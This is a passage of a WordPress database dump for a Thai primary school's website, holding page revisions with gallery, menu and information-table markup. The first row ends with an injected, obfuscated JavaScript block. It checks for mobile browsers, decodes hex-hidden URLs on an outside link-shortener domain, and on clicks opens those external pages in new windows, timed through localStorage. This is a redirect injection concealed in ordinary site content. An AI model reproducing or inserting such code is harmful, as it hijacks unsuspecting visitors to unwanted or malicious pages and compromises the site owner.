g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-03 21:45:24','2024-08-03 14:45:24','',14,'http://pakhaeng.ssk.in.th/?p=512',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(514,1,'2024-08-03 21:49:38','2024-08-03 14:49:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 